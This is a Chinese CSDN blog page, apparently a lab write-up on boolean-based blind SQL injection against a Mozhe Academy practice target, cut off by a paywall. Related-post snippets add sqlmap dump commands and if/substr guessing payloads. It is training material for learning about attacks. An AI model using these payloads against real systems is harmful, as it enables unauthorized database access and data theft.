[墨者学院]SQL注入漏洞测试(布尔盲注)

coco.koko

已于 2022-03-24 17:25:03 修改

阅读量4.2k

点赞数 1

文章标签：安全

于 2022-03-22 00:30:00 首次发布

本文链接：https://blog.csdn.net/m0_60945802/article/details/123636747

版权

length() 函数 返回字符串的长度 
ascii() 返回字符的ascii码   [将字符变为数字wei] 
substr() 截取字符串 （语法:SUBSTR(str,pos,len);）

布尔盲注

1.判断注入点

and -1=-1 页面返回有数据

and -1=-2 页面无结果返回 存在SQL注入。

2. 判断当前页面字段总数

and -1=-1 order by 4 页面返回有数据

and -1=-2 order by 5页面无结果返回

当前页面字段数为：4

3.判断显示位

and -1=-2 union select 1,2,3 页面无结果返回

and -1=-2 union select 1,2,3,4 页面正常返回

无回显点，应该是：盲注并且是布尔盲注（有明显的True和Flash）。

4.猜解当前数据库名称长度

and (length(database()))>9页面返回有数据

and (length(database()))>10页面无结

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

coco.koko

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
[墨者学院]SQL注入漏洞测试(布尔盲注)

复制链接

扫一扫

墨者学院-SQL注入漏洞测试（布尔盲注）

weixin_42939822的博客

03-20

4287

决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境，完善自身解题思路。本题靶场环境比较简单、也比较常见，没有设置严格的过滤规则，仅仅是限制了页面的回显功能，属于比较初级的sql注入题目。废话不多说啦，先附上题目链接：https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*

SQL注入-布尔型盲注

qq_65240014的博客

07-26

523

关于sql注入的略微进阶一点的文章，介绍关于bool型盲注的方法

1 条评论您还未登录，请先登录后发表或查看评论

墨者学院——SQL注入漏洞测试(布尔盲注)

2303_76679642的博客

04-21

389

9.最后看字段值： sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C （字段1，字段2，....） --dump --dbms mysql --batch。8.接着来查找表的字段：sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示，判断这个id的值类型是数字类型。

墨者学院03 SQL注入漏洞测试(布尔盲注)

weixin_42789937的博客

01-24

391

墨者学院03 SQL注入漏洞测试(布尔盲注)，脚本小子的SQL注入实战~

SQL注入漏洞测试(布尔盲注)

cpzzy123的博客

08-14

1333

一.SQL盲注的定义盲注是注入的一种，指的是在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔的盲注。二.直接上实战就拿这个网站的后台管理系统为例，我们先用御剑目录扫描网站目录，居然发现他登陆按钮底下的提示文字目录很有意思，去访问一下：很容易看出来，这个停机维护的文字肯定...

墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)

最新发布

05-29

HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)

WebShell文件上传漏洞分析溯源

02-22

2. 渗透测试：通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描：使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。六、WebShell 文件上传漏洞的实践案例在这个实践案例中，我们使用...

spring IOC实现（墨者革离）

12-12

该代码主要用于spring IOC的实现（墨者革离），模拟一个城门叩问的编剧场景

近墨者未必黑.pdf

12-26

近墨者未必黑.pdf

墨者安全专家 3.7（更新）

11-03

3、墨者漏洞修补通过全面扫描windows和软件中存在的系统漏洞，一键完成补丁的下载与安装，及时排除系统的安全隐患。 4、墨者保护隐私及时清理上网历史记录、网银注册信息、系统临时文件及cookies等，全面保护个人...

墨者学院-SQL注入漏洞测试(布尔盲注)

JimWu的博客

09-04

2675

SQL注入漏洞测试(布尔盲注) 难易程度:★ 题目类型:SQL注入使用工具:FireFox浏览器、kali 1.打开靶场，寻找注入点。点击公告/new_list.php?id=1，找到注入点。 2.输入id=1’ and 1=1，返回空页面输入id=1 and 1=1，返回正常页面。 3.判断数据库名字的长度，输入id=1 and length(database())=1，返回空白页，证...

墨者SQL注入漏洞测试(布尔盲注)题解

zr1213159840的博客

12-11

468

题目明说是布尔盲注，所以直接通过if函数进行注入即可先猜测下数据库的长度 id=1 and 1=if(lenfth(database())=10,1,2) 能看出来，数据库的长度是10, 接着猜数据库的名称，直接添加substr截取一位一位猜，最后猜出来数据库的名称是stromgroup id=1 and 1=if(substr(database(),1,1)=‘s’,1,2) 接着猜库中包含的表有哪些，这个真的是手动搞了一个小时 id=1 and 1=if(substr((select table_n

SQL注入漏洞测试（布尔盲注）初级篇

waxcj的博客

03-25

3785

作为一个信安小白，最近在自学SQL注入，下图是该靶场环境（靶场是墨者学院的一个初级靶场）进入这个sql靶场先观察网站的url发现并没有什么有用的信息，随后就观察网站的其他信息，发现网站除了登录界面下面还有一串滚动的消息“关于平台停机维护的通知”随后我便点了进去，终于找到了有价值的信息仔细观察一下网站url发现了许多可用的信息，随后我就迫不及待的打开了下载好的sqlmap。Sqlmap 是一个自动化的 SQL 注入工具，其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞，目前支.

刷题笔记：SQL注入漏洞测试(布尔盲注)

m0_67399862的博客

05-18

147

由and语句可看到两句都为真时页面正常，一真一假时，页面报错用order by语句查字段数发现4的时候，页面正常，当5的时候，页面报错所以字段数为4 用union select语句进行联合查询时，发现1,2,3,4语句并没有拼接上去在1前面加了个-号，仍然没有信息回显，又想到前面SQL语句执行成功和错误会返回两个不同的页面，所以考虑布尔盲注。用and length(database())>=num语句来判断数据库长度，发现数据库的长度为10 ...

墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看（超详细）

kitiu666的博客

08-26

4065

2020年8月25日，第五次渗透测试。通过对sql语句进行注入，数据库的库名，表名，字段进步爆破，最终获得key。准备需求： 1.windows系统pc 2.2.burpsuite（bp）抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...

渗透测试-SQL注入之布尔盲注和时间盲注

lza20001103的博客

04-20

2750

渗透测试-SQL注入之布尔盲注和时间盲注

sqlmap注入（布尔盲注）

qq_43355651的博客

11-17

8114

本人小白仅仅作为学习笔记希望通过一次次的记录可以一次次的成长 sqlmap是一个自动化的sql注入工具，主要功能是扫描发现并利用注入漏洞使用墨者学院的靶机进行测试这里我们使用的是SQL注入漏洞测试(布尔盲注) 通过滚动条找到注入点然后我们使用的是kali下的工具sqlmap sqlmap -u http://219.153.49.228:46473/new_lis...

墨者学院sql注入布尔

07-27

墨者学院SQL注入布尔是一种常见的SQL注入攻击技术，它利用布尔逻辑来判断SQL查询的真假条件。通过构造恰当的SQL语句，攻击者可以绕过输入验证，直接操作数据库，从而获取、修改或删除敏感数据。在布尔注入攻击中，...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交